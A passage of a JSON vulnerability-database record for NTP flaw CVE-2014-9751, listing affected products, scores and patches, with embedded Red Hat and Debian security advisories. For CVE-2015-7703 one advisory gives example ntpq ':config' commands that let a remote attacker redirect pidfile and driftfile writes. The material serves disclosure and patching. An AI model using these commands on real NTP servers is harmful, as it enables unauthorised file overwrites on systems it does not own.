"eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "flex system p460 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.01:" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.0" }, { "model": "quantum son suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "flex system p460 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)783.10:" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network time protocol 4.2.7p230", "scope": null, "trust": 0.3, "vendor": "meinberg", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.42" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "flex system p270 compute node 01af783 027", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)783.11:" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.38.00" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system p260 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.10:" }, { "model": "flex system p260 compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)783.00:" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ds8800 r6.3 sp9", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system p460 compute node 01af783 022", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)783.01:" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.411" }, { "model": "nsm server software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "flex system p24l compute node 01af783 021", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.00:" }, { "model": "flex system p260 compute node 01af783 026", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)783.10:" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.01" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10" } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "72584" }, { "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "db": "NVD", "id": "CVE-2014-9751" }, { "db": "CNNVD", "id": "CNNVD-201510-027" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "versionStartIncluding": "4.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-9751" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Harlan Stenn", "sources": [ { "db": "BID", "id": "72584" } ], "trust": 0.3 }, "cve": "CVE-2014-9751", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.8, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2014-9751", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-9751", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201510-027", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-9751", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-9751" }, { "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "db": "NVD", "id": "CVE-2014-9751" }, { "db": "CNNVD", "id": "CNNVD-201510-027" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The read_network_packet function in ntp_io.c in ntpd in NTP 4.x before 4.2.8p1 on Linux and OS X does not properly determine whether a source IP address is an IPv6 loopback address, which makes it easier for remote attackers to spoof restricted packets, and read or write to the runtime state, by leveraging the ability to reach the ntpd machine\u0027s network interface with a packet from the ::1 address. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. NTP is prone to a security-bypass vulnerability. \nAttackers can exploit this issue to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ntp security, bug fix, and enhancement update\nAdvisory ID: RHSA-2015:2231-04\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html\nIssue date: 2015-11-19\nCVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 \n CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 \n CVE-2015-3405 \n=====================================================================\n\n1. Summary:\n\nUpdated ntp packages that fix multiple security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol (NTP) is used to synchronize a computer\u0027s time\nwith another referenced time source. These packages include the ntpd\nservice which continuously adjusts system time and utilities used to query\nand configure the ntpd service. \n\nIt was found that because NTP\u0027s access control was based on a source IP\naddress, an attacker could bypass source IP restrictions and send\nmalicious control and configuration packets by spoofing ::1 addresses. \n(CVE-2014-9298, CVE-2014-9751)\n\nA denial of service flaw was found in the way NTP hosts that were peering\nwith each other authenticated themselves before updating their internal\nstate variables. An attacker could send packets to one peer host, which\ncould cascade to other peers, and stop the synchronization process among\nthe reached peers. (CVE-2015-1799)\n\nA flaw was found in the way the ntp-keygen utility generated MD5 symmetric\nkeys on big-endian systems. An attacker could possibly use this flaw to\nguess generated MD5 keys, which could then be used to spoof an NTP client\nor server. (CVE-2015-3405)\n\nA stack-based buffer overflow was found in the way the NTP autokey protocol\nwas implemented. (CVE-2014-9297, CVE-2014-9750)\n\nIt was found that ntpd did not check whether a Message Authentication Code\n(MAC) was present in a received packet when ntpd was configured to use\nsymmetric cryptographic keys. A man-in-the-middle attacker could use this\nflaw to send crafted packets that would be accepted by a client or a peer\nwithout the attacker knowing the symmetric key. (CVE-2015-1798)\n\nThe CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav\nLichv\u00e1r of Red Hat. \n\nBug fixes:\n\n* The ntpd service truncated symmetric keys specified in the key file to 20\nbytes. As a consequence, it was impossible to configure NTP authentication\nto work with peers that use longer keys. With this update, the maximum key\nlength has been changed to 32 bytes. (BZ#1191111)\n\n* The ntpd service could previously join multicast groups only when\nstarting, which caused problems if ntpd was started during system boot\nbefore network was configured. With this update, ntpd attempts to join\nmulticast groups every time network configuration is changed. (BZ#1207014)\n\n* Previously, the ntp-keygen utility used the exponent of 3 when generating\nRSA keys. Consequently, generating RSA keys failed when FIPS mode was\nenabled. With this update, ntp-keygen has been modified to use the exponent\nof 65537, and generating keys in FIPS mode now works as expected. \n(BZ#1191116)\n\n* The ntpd service dropped incoming NTP packets if their source port was\nlower than 123 (the NTP port). With this update, ntpd no longer checks the\nsource port number, and clients behind NAT are now able to correctly\nsynchronize with the server. (BZ#1171640)\n\nEnhancements:\n\n* This update adds support for configurable Differentiated Services Code\nPoints (DSCP) in NTP packets, simplifying configuration in large networks\nwhere different NTP implementations or versions are using different DSCP\nvalues. (BZ#1202828)\n\n* This update adds the ability to configure separate clock stepping\nthresholds for each direction (backward and forward). Use the \"stepback\"\nand \"stepfwd\" options to configure each threshold. (BZ#1193154)\n\n* Support for nanosecond resolution has been added to the Structural\nHealth Monitoring (SHM) reference clock. Prior to this update, when a\nPrecision Time Protocol (PTP) hardware clock was used as a time source to\nsynchronize the system clock, the accuracy of the synchronization was\nlimited due to the microsecond resolution of the SHM protocol. The\nnanosecond extension in the SHM protocol now allows sub-microsecond\nsynchronization of the system clock. (BZ#1117702)\n\nAll ntp users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1117702 - SHM refclock doesn\u0027t support nanosecond resolution\n1122012 - SHM refclock allows only two units with owner-only access\n1171640 - NTP drops requests when sourceport is below 123\n1180721 - ntp: mreadvar command crash in ntpq\n1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1\n1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated\n1191108 - ntpd should warn when monitoring facility can\u0027t be disabled due to restrict configuration\n1191122 - ntpd -x steps clock on leap second\n1193154 - permit differential fwd/back threshold for step vs. slew [PATCH]\n1199430 - CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto\n1199435 - CVE-2015-1799 ntp: authentication doesn\u0027t protect symmetric associations against DoS attacks\n1210324 - CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\naarch64:\nntp-4.2.6p5-22.el7.aarch64.rpm\nntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm\nntpdate-4.2.6p5-22.el7.aarch64.rpm\n\nppc64:\nntp-4.2.6p5-22.el7.ppc64.rpm\nntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm\nntpdate-4.2.6p5-22.el7.ppc64.rpm\n\nppc64le:\nntp-4.2.6p5-22.el7.ppc64le.rpm\nntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm\nntpdate-4.2.6p5-22.el7.ppc64le.rpm\n\ns390x:\nntp-4.2.6p5-22.el7.s390x.rpm\nntp-debuginfo-4.2.6p5-22.el7.s390x.rpm\nntpdate-4.2.6p5-22.el7.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm\nsntp-4.2.6p5-22.el7.aarch64.rpm\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm\nsntp-4.2.6p5-22.el7.ppc64.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm\nsntp-4.2.6p5-22.el7.ppc64le.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-22.el7.s390x.rpm\nsntp-4.2.6p5-22.el7.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-9297\nhttps://access.redhat.com/security/cve/CVE-2014-9298\nhttps://access.redhat.com/security/cve/CVE-2014-9750\nhttps://access.redhat.com/security/cve/CVE-2014-9751\nhttps://access.redhat.com/security/cve/CVE-2015-1798\nhttps://access.redhat.com/security/cve/CVE-2015-1799\nhttps://access.redhat.com/security/cve/CVE-2015-3405\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3\n1hLTu5I/PUzWOnD8rRIlZQ==\n=sWdG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. An attacker could use a specially crafted\n package to cause ntpd to crash if:\n\n * ntpd enabled remote configuration\n * The attacker had the knowledge of the configuration password\n * The attacker had access to a computer entrusted to perform remote\n configuration\n\n Note that remote configuration is disabled by default in NTP. \n\nCVE-2015-5194\n\n It was found that ntpd could crash due to an uninitialized\n variable when processing malformed logconfig configuration\n commands. \n\nCVE-2015-5195\n\n It was found that ntpd exits with a segmentation fault when a\n statistics type that was not enabled during compilation (e.g. \n timingstats) is referenced by the statistics or filegen\n configuration command\n\nCVE-2015-5219\n\n It was discovered that sntp program would hang in an infinite loop\n when a crafted NTP packet was received, related to the conversion\n of the precision value in the packet to double. \n\nCVE-2015-5300\n\n It was found that ntpd did not correctly implement the -g option:\n\n Normally, ntpd exits with a message to the system log if the offset\n exceeds the panic threshold, which is 1000 s by default. This\n option allows the time to be set to any value without restriction;\n however, this can happen only once. If the threshold is exceeded\n after that, ntpd will exit with a message to the system log. This\n option can be used with the -q and -x options. \n\n ntpd could actually step the clock multiple times by more than the\n panic threshold if its clock discipline doesn\u0027t have enough time to\n reach the sync state and stay there for at least one update. If a\n man-in-the-middle attacker can control the NTP traffic since ntpd\n was started (or maybe up to 15-30 minutes after that), they can\n prevent the client from reaching the sync state and force it to step\n its clock by any amount any number of times, which can be used by\n attackers to expire certificates, etc. \n\n This is contrary to what the documentation says. Normally, the\n assumption is that an MITM attacker can step the clock more than the\n panic threshold only once when ntpd starts and to make a larger\n adjustment the attacker has to divide it into multiple smaller\n steps, each taking 15 minutes, which is slow. \n\nCVE-2015-7691, CVE-2015-7692, CVE-2015-7702\n\n It was found that the fix for CVE-2014-9750 was incomplete: three\n issues were found in the value length checks in ntp_crypto.c, where\n a packet with particular autokey operations that contained malicious\n data was not always being completely validated. Receipt of these\n packets can cause ntpd to crash. \n\nCVE-2015-7701\n\n A memory leak flaw was found in ntpd\u0027s CRYPTO_ASSOC. \n\nCVE-2015-7703\n\n Miroslav Lichvar of Red Hat found that the :config command can be\n used to set the pidfile and driftfile paths without any\n restrictions. A remote attacker could use this flaw to overwrite a\n file on the file system with a file containing the pid of the ntpd\n process (immediately) or the current estimated drift of the system\n clock (in hourly intervals). For example:\n\n ntpq -c \u0027:config pidfile /tmp/ntp.pid\u0027\n ntpq -c \u0027:config driftfile /tmp/ntp.drift\u0027\n\n In Debian ntpd is configured to drop root privileges, which limits\n the impact of this issue. \n\nCVE-2015-7704\n\n If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet\n from the server to reduce its polling rate, it doesn\u0027t check if the\n originate timestamp in the reply matches the transmit timestamp from\n its request. An off-path attacker can send a crafted KoD packet to\n the client, which will increase the client\u0027s polling interval to a\n large value and effectively disable synchronization with the server. \n\nCVE-2015-7850\n\n An exploitable denial of service vulnerability exists in the remote\n configuration functionality of the Network Time Protocol. A\n specially crafted configuration file could cause an endless loop\n resulting in a denial of service. An attacker could provide a the\n malicious configuration file to trigger this vulnerability. \n\nCVE-2015-7852\n\n A potential off by one vulnerability exists in the cookedprint\n functionality of ntpq. A specially crafted buffer could cause a\n buffer overflow potentially resulting in null byte being written out\n of bounds. \n\nCVE-2015-7855\n\n It was found that NTP\u0027s decodenetnum() would abort with an assertion\n failure when processing a mode 6 or mode 7 packet containing an\n unusually long data value where a network address was expected. This\n could allow an authenticated attacker to crash ntpd. \n\nCVE-2015-7871\n\n An error handling logic error exists within ntpd that manifests due\n to improper error condition handling associated with certain\n crypto-NAK packets. An unauthenticated, off-path attacker can force\n ntpd processes on targeted servers to peer with time sources of the\n attacker\u0027s choosing by transmitting symmetric active crypto-NAK\n packets to ntpd. This attack bypasses the authentication typically\n required to establish a peer association and allows an attacker to\n make arbitrary changes to system time. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:4.2.6.p5+dfsg-2+deb7u6. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1:4.2.8p4+dfsg-3. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.8p4+dfsg-3. \n\nWe recommend that you upgrade your ntp packages", "sources": [ { "db": "NVD", "id": "CVE-2014-9751" }, { "db": "CERT/CC", "id": "VU#852879" }, { "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "db": "BID", "id": "72584" }, { "db": "VULMON", "id": "CVE-2014-9751" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "134162" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#852879", "trust": 3.6 }, { "db": "NVD", "id": "CVE-2014-9751", "trust": 3.0 }, { "db": "BID", "id": "72584", "trust": 2.0 }, { "db": "ICS CERT", "id": "ICSA-14-353-01", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU96605606", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-008139", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201510-027", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10663", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-9751", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134448", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134162", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9751" }, { "db": "BID", "id": "72584" }, { "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "NVD", "id": "CVE-2014-9751" }, { "db": "CNNVD", "id": "CNNVD-201510-027" } ] }, "id": "VAR-201510-0706", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.42526317 }, "last_update_date": "2023-12-18T10:45:43.033000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "NV15-009", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-009.html" }, { "title": "Bug 2672", "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2672" }, { "title": "Security Notice", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#december_2014_ntp_security_vulne" }, { "title": "Bug 1184572", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1184572" }, { "title": "RHSA-2015:1459", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-1459.html" }, { "title": "NTP ntpd Fixes for code injection vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=57885" }, { "title": "Red Hat: Moderate: ntp security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152231 - security advisory" }, { "title": "Debian Security Advisories: DSA-3154-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=79bca69a97f389f5ace450cd721cf945" }, { "title": "Red Hat: CVE-2014-9751", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-9751" }, { "title": "Debian Security Advisories: DSA-3388-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=61fe4252a877d02aaea1c931efa0a305" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-9751" }, { "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "db": "CNNVD", "id": "CNNVD-201510-027" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "db": "NVD", "id": "CVE-2014-9751" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "http://www.kb.cert.org/vuls/id/852879" }, { "trust": 2.0, "url": "http://bugs.ntp.org/show_bug.cgi?id=2672" }, { "trust": 2.0, "url": 